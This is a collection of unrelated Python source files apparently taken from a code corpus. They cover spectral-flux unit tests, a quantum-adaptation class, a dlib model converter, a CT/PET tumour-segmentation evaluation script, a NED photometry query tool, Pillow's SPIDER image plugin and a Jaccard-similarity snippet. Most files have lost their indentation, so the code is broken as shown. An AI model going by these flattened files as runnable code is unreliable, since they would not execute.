flux, flux_error = exppowerlaw.integral_error(energy_min, energy_max)
assert_allclose(flux.value[0] / 1e-13, 5.05855622, rtol=0.01)
assert_allclose(flux_error.value[0] / 1e-14, 8.552617, rtol=0.01)
def test_energy_flux_error_power_law():
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
powerlaw = PowerLawSpectralModel()
powerlaw.parameters["index"].error = 0.4
powerlaw.parameters["amplitude"].error = 1e-13
enrg_flux, enrg_flux_error = powerlaw.energy_flux_error(energy_min, energy_max)
assert_allclose(enrg_flux.value / 1e-12, 2.303, rtol=0.001)
assert_allclose(enrg_flux_error.value / 1e-12, 1.085, rtol=0.001)
def test_energy_flux_error_exp_cutoff_power_law():
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
exppowerlaw = ExpCutoffPowerLawSpectralModel()
exppowerlaw.parameters["index"].error = 0.4
exppowerlaw.parameters["amplitude"].error = 1e-13
exppowerlaw.parameters["lambda_"].error = 0.03
enrg_flux, enrg_flux_error = exppowerlaw.energy_flux_error(energy_min, energy_max)
assert_allclose(enrg_flux.value / 1e-12, 2.788, rtol=0.001)
assert_allclose(enrg_flux_error.value / 1e-12, 1.419, rtol=0.001)
|
the-stack_0_25209
|
#!/usr/bin/env python3
#
# Copyright (c) 2019 Pedro Heleno Isolani
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
KEEP_CONFIGURATION = 0
EXPLOITATION = 1
EXPLORATION = 2
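# Minimal usage sketch (not part of the original file) for the
# ExponentialQuantumAdaptation class defined below. The starting quantum of
# 1000 and the call pattern are illustrative assumptions only:
#   adaptation = ExponentialQuantumAdaptation()
#   quantum = adaptation.get_new_quantum(1000)     # status KEEP_CONFIGURATION -> 1000
#   adaptation.exploit()                           # exploitation_trigger=1 -> EXPLOITATION
#   quantum = adaptation.get_new_quantum(quantum)  # 1000 - 20% = 800
#   for _ in range(5):                             # exploration_trigger=5 -> EXPLORATION
#       adaptation.explore()
#   quantum = adaptation.get_new_quantum(quantum)  # 800 + 5% = 840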
""" Simple Exponential Quantum Adaptation using different adaptation rates for Exploitation and Exploration """
class ExponentialQuantumAdaptation:
def __init__(self,
exploration_rate=0.05, exploration_trigger=5,
exploitation_rate=0.20, exploitation_trigger=1,
min_quantum=200):
self.exploration_rate = exploration_rate # % to increase BE quantum
self.exploitation_rate = exploitation_rate # % to decrease BE quantum
self.exploration_trigger = exploration_trigger # int to represent when to increase BE quantum
self.exploitation_trigger = exploitation_trigger # int to represent when to decrease BE quantum
self.exploration_counter = 0 # int to trigger exploration
self.exploitation_counter = 0 # int to trigger exploitation
self.min_quantum = min_quantum
self.status = KEEP_CONFIGURATION
def exploit(self):
self.exploitation_counter += 1
if self.exploitation_counter >= self.exploitation_trigger:
self.status = EXPLOITATION
self.exploitation_counter = 0
def explore(self):
self.exploration_counter += 1
if self.exploration_counter >= self.exploration_trigger:
self.status = EXPLORATION
self.exploration_counter = 0
def get_new_quantum(self, old_quantum):
if self.status == EXPLORATION:
new_quantum = int(old_quantum + (old_quantum * self.exploration_rate))
elif self.status == EXPLOITATION:
new_quantum = int(old_quantum - (old_quantum * self.exploitation_rate))
if new_quantum < self.min_quantum:
new_quantum = self.min_quantum
else:
new_quantum = int(old_quantum)
self.status = KEEP_CONFIGURATION
return new_quantum
def __str__(self):
        return "Exploitation rate: " + str(self.exploitation_rate) + \
               " trigger: " + str(self.exploitation_trigger) + \
               " counter: " + str(self.exploitation_counter) + \
               " Exploration rate: " + str(self.exploration_rate) + \
               " trigger: " + str(self.exploration_trigger) + \
               " counter: " + str(self.exploration_counter)
|
the-stack_0_25211
|
import os
import sys
import argparse
import tensorflow as tf
from converter.model import build_dlib_model
from converter.weights import load_weights
def main(args):
""" Main entry point """
# Build the model (just the graph)
keras_model = build_dlib_model(use_bn=False)
keras_model.summary()
# parse xml and load weights
load_weights(keras_model, args.xml_path)
# save it as h5
keras_model.save("dlib_face_recognition_resnet_model_v1.h5")
# save it as saved_model
tf.saved_model.save(keras_model,'./saved_model/')
def parse_arg(argv):
""" Parse the arguments """
arg_paser = argparse.ArgumentParser()
arg_paser.add_argument(
'--xml-path',
type=str,
required=True,
help='Path to the dlib recognition xml file')
return arg_paser.parse_args(argv)
if __name__ == '__main__':
main(parse_arg(sys.argv[1:]))
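# Example invocation (illustrative only; the script and xml file names are
# assumptions and must point to your local copy of dlib's recognition model
# description):
#   python convert_dlib_model.py --xml-path dlib_face_recognition_resnet_model_v1.xml
# On success this writes dlib_face_recognition_resnet_model_v1.h5 and ./saved_model/.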
|
the-stack_0_25212
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import argparse
import SimpleITK as sitk
import tensorflow as tf
import os
import numpy as np
import pandas as pd
import time
import itertools
import random
import sys
import glob
import pickle
from datetime import datetime
from tensorflow.python.saved_model import loader
from dltk.io.augmentation import add_gaussian_noise, flip, extract_class_balanced_example_array, elastic_transform
from dltk.io.preprocessing import whitening
from myconfig import *
# supports numpy arrays and tensorflow tensors
def NDHWC_to_NCHWD(arr):
try:
return tf.transpose(arr, perm=(0,4,2,3,1))
except:
return arr.transpose((0,4,2,3,1))
def NCHWD_to_NDHWC(arr):
try:
return tf.transpose(arr, perm=(0,4,2,3,1))
except:
return arr.transpose((0,4,2,3,1))
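# Quick shape sanity check (not part of the original file): for a
# [batch, D, H, W, C] numpy array the helpers swap the depth and channel
# axes, and applying the same permutation twice restores the input, e.g.
#   x = np.zeros((1, 8, 16, 16, 2))
#   NDHWC_to_NCHWD(x).shape                    # (1, 2, 16, 16, 8)
#   NCHWD_to_NDHWC(NDHWC_to_NCHWD(x)).shape    # (1, 8, 16, 16, 2)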
def dataset_input_from_tfrecords(filenames, batch_size=1, num_epochs=1, shuffle=True):
# filenames = ["/var/data/file1.tfrecord", "/var/data/file2.tfrecord"]
dataset = tf.data.TFRecordDataset(filenames)
# Use `tf.parse_single_example()` to extract data from a `tf.Example`
# protocol buffer, and perform any additional per-record preprocessing.
def parser(record):
keys_to_features = {
'case_name': tf.FixedLenFeature([], tf.string),
'image_raw': tf.FixedLenFeature([], tf.string),
'label_raw': tf.FixedLenFeature([], tf.string),
}
parsed = tf.parse_single_example(record, keys_to_features)
case_name = parsed['case_name']
# Perform additional preprocessing on the parsed data.
image = tf.decode_raw(parsed['image_raw'], tf.uint8)
image = tf.reshape(image, [DEPTH, HEIGHT, WIDTH, 2])
label = tf.decode_raw(parsed['label_raw'], tf.uint8)
label = tf.reshape(label, [DEPTH, HEIGHT, WIDTH, 2])
image = tf.cast(image, tf.float32)
return image, label, case_name
# Use `Dataset.map()` to build a pair of a feature dictionary and a label
# tensor for each example.
dataset = dataset.map(parser)
if shuffle:
dataset = dataset.shuffle(buffer_size=128)
dataset = dataset.batch(batch_size)
# dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(batch_size))
dataset = dataset.repeat(num_epochs)
iterator = dataset.make_one_shot_iterator()
features, labels, case_names = iterator.get_next()
return features, labels, case_names
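# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original file; assumes TF1-style
# graph execution and an existing "train.tfrecord" written with the matching
# DEPTH/HEIGHT/WIDTH shapes):
#   features, labels, case_names = dataset_input_from_tfrecords(
#       ["train.tfrecord"], batch_size=2, num_epochs=1, shuffle=False)
#   with tf.Session() as sess:
#       try:
#           while True:
#               img, lbl, name = sess.run([features, labels, case_names])
#       except tf.errors.OutOfRangeError:
#           pass
# ---------------------------------------------------------------------------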
def dice_tf(logits, labels, threshold=0.5, axis=[1,2,3], smooth=1e-5):
logits = tf.cast(logits, dtype=tf.float32)
labels = tf.cast(labels, dtype=tf.float32)
logits = tf.cast(logits > threshold, dtype=tf.float32)
labels = tf.cast(labels > threshold, dtype=tf.float32)
inse = tf.reduce_sum(tf.multiply(logits, labels), axis=axis)
l = tf.reduce_sum(logits, axis=axis)
r = tf.reduce_sum(labels, axis=axis)
hard_dice = (2. * inse + smooth) / (l + r + smooth)
hard_dice = tf.reduce_mean(hard_dice)
return hard_dice
def dice_loss1(logits, labels, threshold=0.5, axis=[1,2,3], smooth=1e-5):
# exponential_map = tf.exp(logits)
# sum_exp = tf.reduce_sum(exponential_map, 4, keep_dims=True)
# tensor_sum_exp = tf.tile(sum_exp, tf.stack([1, 1, 1, 1, tf.shape(logits)[4]]))
# prediction = tf.div(exponential_map,tensor_sum_exp)
prediction = tf.nn.softmax(logits, axis=4)
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
labels_expand = tf.concat([1-labels, labels], axis=4)
eps = 1e-5
intersection = tf.reduce_sum(prediction * labels_expand, axis=[1,2,3,4])
union = eps + tf.reduce_sum(prediction, axis=[1,2,3,4]) + tf.reduce_sum(labels_expand, axis=[1,2,3,4])
loss = tf.reduce_mean(1.0 - (2 * intersection/ (union)))
return loss
def dice_loss(logits, labels, threshold=0.5, axis=[1,2,3], smooth=1e-5):
labels = tf.cast(labels, tf.float32)
prediction = tf.nn.softmax(logits, axis=4)
eps = 1e-5
intersection = tf.reduce_sum(prediction[...,1] * labels, axis=[1,2,3])
union = eps + tf.reduce_sum(prediction[...,1], axis=[1,2,3]) + tf.reduce_sum(labels, axis=[1,2,3])
loss = tf.reduce_mean(1.0 - (2 * intersection/ (union)))
return loss
def computeDice(y_true, y_pred):
y_true_f = y_true.flatten()>0.5
y_pred_f = y_pred.flatten()>0.5
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + 1e-5) / (np.sum(y_true_f) + np.sum(y_pred_f) + 1e-5)
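# Minimal numpy check of computeDice (illustrative only): two 2x2 masks that
# overlap in exactly one voxel give Dice ~ 2*1 / (2 + 2) = 0.5.
def _example_compute_dice():
    y_true = np.array([[1, 1], [0, 0]], dtype=np.float32)
    y_pred = np.array([[1, 0], [1, 0]], dtype=np.float32)
    print(computeDice(y_true, y_pred))  # ~0.5, up to the 1e-5 smoothing terms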
def focal_loss1(labels, logits, gamma=1.0, alpha=1.0):
epsilon = 1e-9
prediction = tf.nn.softmax(logits, axis=4)
model_out = tf.add(prediction, epsilon)
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
labels_expand = tf.concat([1-labels, labels], axis=4)
ce = tf.multiply(labels_expand, -tf.log(model_out))
weight = tf.multiply(labels_expand, tf.pow(tf.subtract(1., model_out), gamma))
fl = tf.multiply(alpha, tf.multiply(weight, ce))
reduced_fl = tf.reduce_mean(tf.reduce_max(fl, axis=[4]))
return reduced_fl
def focal_loss(labels, logits, alpha=0.25, gamma=2.0):
predictions = tf.nn.sigmoid(logits)
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
onehot_labels = tf.concat([1.-labels, labels], axis=4)
predictions_pt = tf.where(tf.equal(onehot_labels, 1.0), predictions, 1.-predictions)
# add small value to avoid 0
epsilon = 1e-8
alpha_t = tf.scalar_mul(alpha, tf.ones_like(onehot_labels, dtype=tf.float32))
alpha_t = tf.where(tf.equal(onehot_labels, 1.0), alpha_t, 1-alpha_t)
losses = tf.reduce_sum(-alpha_t * tf.pow(1. - predictions_pt, gamma) * tf.log(predictions_pt+epsilon), axis=4)
return tf.reduce_mean(losses)
def binary_cross_entropy(labels, logits):
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
onehot_labels = tf.concat([1.-labels, labels], axis=4)
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=onehot_labels, logits=logits))
return loss
def parse_args():
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--net_type", type=str, default='myunet_bn')
parser.add_argument("--use_bn", type=int, default=1)
parser.add_argument("--use_crf", type=int, default=0)
parser.add_argument("--restore_ckpt_meta", type=str, default='')
parser.add_argument("--feat_index", type=int, default=0) # 0: ct, 1: pt
parser.add_argument('--random_seed', type=int, default=42)
parser.add_argument('--test_filenames', type=str, default='testForTest0.csv')
parser.add_argument('--norm_type', type=str, default='nonorm')
args = parser.parse_args()
return args
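# Hedged example invocation (script name, checkpoint path and csv names are hypothetical):
#   python test_model.py --net_type myunet3d_bn_crf \
#       --restore_ckpt_meta /path/to/model.ckpt-10000.meta \
#       --test_filenames testForTest0.csv,testForVal0.csv,testForTrain0.csv \
#       --norm_type globalnorm_meanstd --feat_index 0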
def main():
args = parse_args()
np.random.seed(args.random_seed)
tf.set_random_seed(args.random_seed)
subsets = ['train', 'val', 'test']
image_mean = IMAGE_MEAN
image_std = IMAGE_STD
image_mean_tensor = tf.constant(image_mean, dtype=tf.float32)
image_std_tensor = tf.constant(image_std, dtype=tf.float32)
phase_train = tf.placeholder(tf.bool, name='phase_train')
global_step = tf.Variable(0, trainable=False)
image_node = tf.placeholder(tf.float32, shape=[None, DEPTH, HEIGHT, WIDTH, 2])
label_node = tf.placeholder(tf.int32, shape=[None, DEPTH, HEIGHT, WIDTH, 2])
if args.norm_type == 'nonorm':
image_node_new = image_node
elif args.norm_type == 'globalnorm_mean':
image_node_new = image_node - image_mean_tensor
elif args.norm_type == 'globalnorm_meanstd':
image_node_new = image_node - image_mean_tensor
image_node_new /= image_std_tensor
elif args.norm_type == 'instancenorm_mean':
image_node_new = tf.map_fn(lambda frame: frame - tf.reduce_mean(frame, axis=[0,1,2], keep_dims=True), image_node)
elif args.norm_type == 'instancenorm_meanstd':
batch_mean, batch_var = tf.nn.moments(image_node, axes=[1,2,3], keep_dims=True)
image_node_new = (image_node - batch_mean) / tf.sqrt(batch_var + 1e-6)
if args.net_type == 'myunet3d_bn_crf':
from myunet3d_basic import myunet3d_bn_crf
net_output_ops = myunet3d_bn_crf(
name='ct' if args.feat_index==0 else 'pt',
inputs=image_node_new[...,args.feat_index][...,tf.newaxis],
num_classes=NUM_CLASSES,
phase_train=phase_train,
use_bias=True,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
bias_initializer=tf.constant_initializer(value=0.1),
kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-4),
bias_regularizer=tf.contrib.layers.l2_regularizer(1e-4),
use_crf=args.use_crf,
args=args)
pred_op = net_output_ops['y_']
prob_op = net_output_ops['y_prob']
print('pred_op shape: ', pred_op.shape)
print('prob_op shape: ', prob_op.shape)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=10)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
restore_ckpt = args.restore_ckpt_meta[:-5]
print(restore_ckpt)
save_dir = restore_ckpt + '_results'
saver1 = tf.train.import_meta_graph('{}.meta'.format(restore_ckpt))
saver1.restore(sess, '{}'.format(restore_ckpt))
if save_dir != '' and not os.path.exists(save_dir):
os.makedirs(save_dir)
dices = []
for idx, filename in enumerate(args.test_filenames.split(',')):
test_filenames = pd.read_csv(
DATA_ROOT + '/' + filename,
dtype=object,
keep_default_na=False,
na_values=[]).as_matrix()
dice_val = []
for f in test_filenames:
subject_id = f[0]
img_fn = f[1]
case_name = img_fn.split('/')[-1]
ct_sitk = sitk.ReadImage(str(os.path.join(img_fn, 'InputCT_ROI.nii.gz')))
ct = sitk.GetArrayFromImage(ct_sitk).astype((np.float32))
pt_sitk = sitk.ReadImage(str(os.path.join(img_fn, 'InputPET_SUV_ROI.nii.gz')))
pt = sitk.GetArrayFromImage(pt_sitk).astype((np.float32))
lbl_ct = sitk.GetArrayFromImage(sitk.ReadImage(str(os.path.join(
img_fn, 'GTV_Primary_ROI_CT{}.nii.gz'.format(GT_POSTFIX))))).astype(np.uint8)
lbl_pt = sitk.GetArrayFromImage(sitk.ReadImage(str(os.path.join(
img_fn, 'GTV_Primary_ROI_PET{}.nii.gz'.format(GT_POSTFIX))))).astype(np.uint8)
ct[ct>200.] = 200.
ct[ct<-500.] = -500.
ct = 255*(ct+500)/(700.)
pt[pt<0.01]=0.01
pt[pt>20.]=20.
pt = 255*(pt-0.01)/(19.99)
image = np.concatenate([ct[...,np.newaxis],pt[...,np.newaxis]], axis=3)
label = np.concatenate([lbl_ct[...,np.newaxis],lbl_pt[...,np.newaxis]], axis=3)
pred, prob = sess.run([pred_op, prob_op],
feed_dict={image_node: image[np.newaxis,...],
label_node: label[np.newaxis,...],
phase_train: False})
dice_val_ = computeDice(label[...,args.feat_index], pred[0])
dice_val.append(dice_val_)
if save_dir != '':
case_save_dir = '{}/{}'.format(save_dir, case_name)
if not os.path.exists(case_save_dir):
os.makedirs(case_save_dir)
new_sitk_ct = sitk.GetImageFromArray(pred[0].astype(np.int32))
new_sitk_ct.CopyInformation(ct_sitk)
sitk.WriteImage(new_sitk_ct, str('{}/crf0_pred_{}.nii.gz'.format(case_save_dir,
'ct' if args.feat_index==0 else 'pt')))
new_sitk_ct = sitk.GetImageFromArray(prob[0][...,1].astype(np.float32))
new_sitk_ct.CopyInformation(pt_sitk)
sitk.WriteImage(new_sitk_ct, str('{}/crf0_prob_{}.nii.gz'.format(case_save_dir,
'ct' if args.feat_index==0 else 'pt')))
dices.append(np.mean(np.array(dice_val)))
    print('FINAL_TEST ' + ' '.join('{:.4f}'.format(d) for d in dices))
if __name__ == '__main__':
main()
|
the-stack_0_25213
|
#!/usr/bin/python3
# Copyright (C) 2016 Zhixian MA <[email protected]>
"""
A tool to query photometry of radio astro-objects from the NED
NASA/IPAC Extragalactic Database
http://ned.ipac.caltech.edu/
"""
from astroquery.ned import Ned
import numpy as np
import astroquery
import argparse
def main():
"""
Fetch radio infos from NED
References
----------
[1] astroquery
http://astroquery.readthedocs.io/en/latest/
"""
# Init
parser = argparse.ArgumentParser(
description='A tool to query photometry of radio astro-objects from the NED')
# parameters
parser.add_argument("objname", help="file path of object list.")
parser.add_argument("dataname", help="file path to save query result.")
parser.add_argument("freq", help="Upper limit of frequency.")
parser.add_argument("errlist", help="file path to save object names with errors.")
args = parser.parse_args()
# get arguments
objname = args.objname
dataname = args.dataname
freq = float(args.freq)
errlist = args.errlist
# fetch data
f = open(objname, 'r')
fs = open(dataname, 'w')
fn = open(errlist, 'w')
fs.write("Name\tBand\tFlux\tUncertainty\tUnits\tRefcode\n")
for sample in f:
print("Sample name: %s" % sample[:-1])
# fetch table
try:
obj_table = Ned.get_table(sample, table='photometry')
except astroquery.exceptions.RemoteServiceError:
fn.write('%s\n' % sample)
continue
# find radio info
freq_list = np.array(obj_table['Frequency'])
freq_idx = np.where(freq_list <= freq)[0]
print(freq_idx)
if len(freq_idx) >= 1:
# Judge measurements and uncertainties
uncer = obj_table['Uncertainty'][freq_idx]
if len(uncer) == 1:
freq_str = obj_table['Observed Passband'][freq_idx[0]]
flux = obj_table['Photometry Measurement'][freq_idx[0]]
unit = obj_table['Units'][freq_idx[0]]
ref = obj_table['Refcode'][freq_idx[0]]
# bytes to str
freq_str = str(freq_str, encoding='utf-8')
unit = str(unit, encoding='utf-8')
ref = str(ref, encoding='utf-8')
fs.write("%s\t%s\t%f\t%s\t%s\t%s\n" %
(sample[:-1], freq_str, flux, str(uncer[0], encoding='utf-8'), unit, ref))
else:
for i in range(len(uncer)):
if len(uncer[i]):
freq_str = obj_table['Observed Passband'][freq_idx[i]]
flux = obj_table['Photometry Measurement'][freq_idx[i]]
unit = obj_table['Units'][freq_idx[i]]
ref = obj_table['Refcode'][freq_idx[i]]
# bytes to str
freq_str = str(freq_str, encoding='utf-8')
unit = str(unit, encoding='utf-8')
ref = str(ref, encoding='utf-8')
fs.write("%s\t%s\t%f\t%s\t%s\t%s\n" %
(sample[:-1], freq_str, flux, str(uncer[i], encoding='utf-8'),
unit, ref))
f.close()
fs.close()
fn.close()
if __name__ == "__main__":
main()
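# Hedged example invocation (file names are hypothetical); the third argument is the
# upper frequency limit, in the same units as NED's Frequency column (Hz):
#   python ned_radio_query.py object_list.txt radio_photometry.tsv 1e10 failed_objects.txt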
|
the-stack_0_25214
|
# -*- coding: utf-8 -*-
# @Time : 2017/9/5 09:52
# @Author : Forec
# @File : main/views.py
# @Project : WildPointer
# @license : Copyright(C), Forec
# @Contact : [email protected]
from flask import render_template
from flask_login import current_user
from . import main
from ..models import Post, Question, Tag
@main.route('/', methods=['GET'])
def index():
mail_address = 'None@None' if not current_user.is_authenticated else current_user.email
    # split on '@' to recover the mail domain, e.g. 'user@example.com' -> 'mail.example.com'
    mail_address = '#' if len(mail_address.split('@')) < 2 else mail_address.split('@')[1]
mail_address = 'mail.' + mail_address
posts = Post.query.order_by(Post.create.desc()).slice(0, 6)
questions = Question.query.order_by(Question.create.desc()).slice(0, 6)
hot_tags = Tag.query.order_by(Tag.count.asc()).slice(0, 16).all()
return render_template('index.html', posts=posts, questions=questions, mail_address=mail_address,
tags=hot_tags, used_tags=[], type='all')
@main.route('/faq', methods=['GET'])
def faq():
return render_template('faq.html')
|
the-stack_0_25217
|
#
# The Python Imaging Library.
#
# SPIDER image file handling
#
# History:
# 2004-08-02 Created BB
# 2006-03-02 added save method
# 2006-03-13 added support for stack images
#
# Copyright (c) 2004 by Health Research Inc. (HRI) RENSSELAER, NY 12144.
# Copyright (c) 2004 by William Baxter.
# Copyright (c) 2004 by Secret Labs AB.
# Copyright (c) 2004 by Fredrik Lundh.
#
##
# Image plugin for the Spider image format. This format is used
# by the SPIDER software, in processing image data from electron
# microscopy and tomography.
##
#
# SpiderImagePlugin.py
#
# The Spider image format is used by SPIDER software, in processing
# image data from electron microscopy and tomography.
#
# Spider home page:
# https://spider.wadsworth.org/spider_doc/spider/docs/spider.html
#
# Details about the Spider image format:
# https://spider.wadsworth.org/spider_doc/spider/docs/image_doc.html
#
import os
import struct
import sys
from PIL import Image, ImageFile
def isInt(f):
try:
i = int(f)
if f - i == 0:
return 1
else:
return 0
except (ValueError, OverflowError):
return 0
iforms = [1, 3, -11, -12, -21, -22]
# There is no magic number to identify Spider files, so just check a
# series of header locations to see if they have reasonable values.
# Returns no. of bytes in the header, if it is a valid Spider header,
# otherwise returns 0
def isSpiderHeader(t):
h = (99,) + t # add 1 value so can use spider header index start=1
# header values 1,2,5,12,13,22,23 should be integers
for i in [1, 2, 5, 12, 13, 22, 23]:
if not isInt(h[i]):
return 0
# check iform
iform = int(h[5])
if iform not in iforms:
return 0
# check other header values
labrec = int(h[13]) # no. records in file header
labbyt = int(h[22]) # total no. of bytes in header
lenbyt = int(h[23]) # record length in bytes
if labbyt != (labrec * lenbyt):
return 0
# looks like a valid header
return labbyt
def isSpiderImage(filename):
with open(filename, "rb") as fp:
f = fp.read(92) # read 23 * 4 bytes
t = struct.unpack(">23f", f) # try big-endian first
hdrlen = isSpiderHeader(t)
if hdrlen == 0:
t = struct.unpack("<23f", f) # little-endian
hdrlen = isSpiderHeader(t)
return hdrlen
class SpiderImageFile(ImageFile.ImageFile):
format = "SPIDER"
format_description = "Spider 2D image"
_close_exclusive_fp_after_loading = False
def _open(self):
# check header
n = 27 * 4 # read 27 float values
f = self.fp.read(n)
try:
self.bigendian = 1
t = struct.unpack(">27f", f) # try big-endian first
hdrlen = isSpiderHeader(t)
if hdrlen == 0:
self.bigendian = 0
t = struct.unpack("<27f", f) # little-endian
hdrlen = isSpiderHeader(t)
if hdrlen == 0:
raise SyntaxError("not a valid Spider file")
except struct.error as e:
raise SyntaxError("not a valid Spider file") from e
h = (99,) + t # add 1 value : spider header index starts at 1
iform = int(h[5])
if iform != 1:
raise SyntaxError("not a Spider 2D image")
self._size = int(h[12]), int(h[2]) # size in pixels (width, height)
self.istack = int(h[24])
self.imgnumber = int(h[27])
if self.istack == 0 and self.imgnumber == 0:
# stk=0, img=0: a regular 2D image
offset = hdrlen
self._nimages = 1
elif self.istack > 0 and self.imgnumber == 0:
# stk>0, img=0: Opening the stack for the first time
self.imgbytes = int(h[12]) * int(h[2]) * 4
self.hdrlen = hdrlen
self._nimages = int(h[26])
# Point to the first image in the stack
offset = hdrlen * 2
self.imgnumber = 1
elif self.istack == 0 and self.imgnumber > 0:
# stk=0, img>0: an image within the stack
offset = hdrlen + self.stkoffset
self.istack = 2 # So Image knows it's still a stack
else:
raise SyntaxError("inconsistent stack header values")
if self.bigendian:
self.rawmode = "F;32BF"
else:
self.rawmode = "F;32F"
self.mode = "F"
self.tile = [("raw", (0, 0) + self.size, offset, (self.rawmode, 0, 1))]
self.__fp = self.fp # FIXME: hack
@property
def n_frames(self):
return self._nimages
@property
def is_animated(self):
return self._nimages > 1
# 1st image index is zero (although SPIDER imgnumber starts at 1)
def tell(self):
if self.imgnumber < 1:
return 0
else:
return self.imgnumber - 1
def seek(self, frame):
if self.istack == 0:
raise EOFError("attempt to seek in a non-stack file")
if not self._seek_check(frame):
return
self.stkoffset = self.hdrlen + frame * (self.hdrlen + self.imgbytes)
self.fp = self.__fp
self.fp.seek(self.stkoffset)
self._open()
# returns a byte image after rescaling to 0..255
def convert2byte(self, depth=255):
(minimum, maximum) = self.getextrema()
m = 1
if maximum != minimum:
m = depth / (maximum - minimum)
b = -m * minimum
return self.point(lambda i, m=m, b=b: i * m + b).convert("L")
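    # Worked example of the rescaling above (illustrative): with extrema
    # (minimum, maximum) = (-1.0, 3.0) and depth=255, m = 255/4 = 63.75 and
    # b = 63.75, so -1.0 maps to 0 and 3.0 maps to 255 before the "L" convert.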
# returns a ImageTk.PhotoImage object, after rescaling to 0..255
def tkPhotoImage(self):
from PIL import ImageTk
return ImageTk.PhotoImage(self.convert2byte(), palette=256)
def _close__fp(self):
try:
if self.__fp != self.fp:
self.__fp.close()
except AttributeError:
pass
finally:
self.__fp = None
# --------------------------------------------------------------------
# Image series
# given a list of filenames, return a list of images
def loadImageSeries(filelist=None):
"""create a list of :py:class:`~PIL.Image.Image` objects for use in a montage"""
if filelist is None or len(filelist) < 1:
return
imglist = []
for img in filelist:
if not os.path.exists(img):
print(f"unable to find {img}")
continue
try:
with Image.open(img) as im:
im = im.convert2byte()
except Exception:
if not isSpiderImage(img):
print(img + " is not a Spider image file")
continue
im.info["filename"] = img
imglist.append(im)
return imglist
# --------------------------------------------------------------------
# For saving images in Spider format
def makeSpiderHeader(im):
nsam, nrow = im.size
lenbyt = nsam * 4 # There are labrec records in the header
labrec = int(1024 / lenbyt)
if 1024 % lenbyt != 0:
labrec += 1
labbyt = labrec * lenbyt
nvalues = int(labbyt / 4)
if nvalues < 23:
return []
hdr = []
for i in range(nvalues):
hdr.append(0.0)
# NB these are Fortran indices
hdr[1] = 1.0 # nslice (=1 for an image)
hdr[2] = float(nrow) # number of rows per slice
hdr[3] = float(nrow) # number of records in the image
hdr[5] = 1.0 # iform for 2D image
hdr[12] = float(nsam) # number of pixels per line
hdr[13] = float(labrec) # number of records in file header
hdr[22] = float(labbyt) # total number of bytes in header
hdr[23] = float(lenbyt) # record length in bytes
# adjust for Fortran indexing
hdr = hdr[1:]
hdr.append(0.0)
# pack binary data into a string
return [struct.pack("f", v) for v in hdr]
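# Worked sizing example for makeSpiderHeader (illustrative, not part of the
# original plugin): a 100x100 float image gives lenbyt = 100*4 = 400,
# labrec = ceil(1024/400) = 3 and labbyt = 1200, i.e. 300 packed header floats.
def _example_spider_header_size():
    hdr = makeSpiderHeader(Image.new("F", (100, 100)))
    assert len(hdr) == 300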
def _save(im, fp, filename):
if im.mode[0] != "F":
im = im.convert("F")
hdr = makeSpiderHeader(im)
if len(hdr) < 256:
raise OSError("Error creating Spider header")
# write the SPIDER header
fp.writelines(hdr)
rawmode = "F;32NF" # 32-bit native floating point
ImageFile._save(im, fp, [("raw", (0, 0) + im.size, 0, (rawmode, 0, 1))])
def _save_spider(im, fp, filename):
# get the filename extension and register it with Image
ext = os.path.splitext(filename)[1]
Image.register_extension(SpiderImageFile.format, ext)
_save(im, fp, filename)
# --------------------------------------------------------------------
Image.register_open(SpiderImageFile.format, SpiderImageFile)
Image.register_save(SpiderImageFile.format, _save_spider)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Syntax: python3 SpiderImagePlugin.py [infile] [outfile]")
sys.exit()
filename = sys.argv[1]
if not isSpiderImage(filename):
print("input image must be in Spider format")
sys.exit()
with Image.open(filename) as im:
print("image: " + str(im))
print("format: " + str(im.format))
print("size: " + str(im.size))
print("mode: " + str(im.mode))
print("max, min: ", end=" ")
print(im.getextrema())
if len(sys.argv) > 2:
outfile = sys.argv[2]
# perform some image operation
im = im.transpose(Image.Transpose.FLIP_LEFT_RIGHT)
print(
f"saving a flipped version of {os.path.basename(filename)} "
f"as {outfile} "
)
im.save(outfile, SpiderImageFile.format)
|
the-stack_0_25219
|
#!/usr/bin/env python3
from collections import Counter
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
def get_jaccard_sim(str1, str2):
a = set(str1.split())
b = set(str2.split())
c = a.intersection(b)
return float(len(c)) / (len(a) + len(b) - len(c))
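# Worked example (illustrative): for "This is a very interesting text" and
# "This is another text, also very interesting" the word sets have 6 and 7
# members and share 4 ("This", "is", "very", "interesting"; "text" != "text,"),
# so get_jaccard_sim returns 4 / (6 + 7 - 4) = 4/9 ~ 0.444.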
# def get_cosine_sim(*strs):
# vectors = [t for t in get_vectors(*strs)]
# return cosine_similarity(vectors)
# def get_vectors(*strs):
# text = [t for t in strs]
# vectorizer = CountVectorizer(text)
# vectorizer.fit(text)
# return vectorizer.transform(text).toarray()
if __name__ == '__main__':
text1 = "This is a very interesting text"
text2 = "This is another text, also very interesting"
print("Jaccard: {}".format(get_jaccard_sim(text1,text2)))
# print("Cosine: {}".format(get_cosine_sim(text1,text2)))
|
the-stack_0_25221
|
#!/usr/bin/env python3
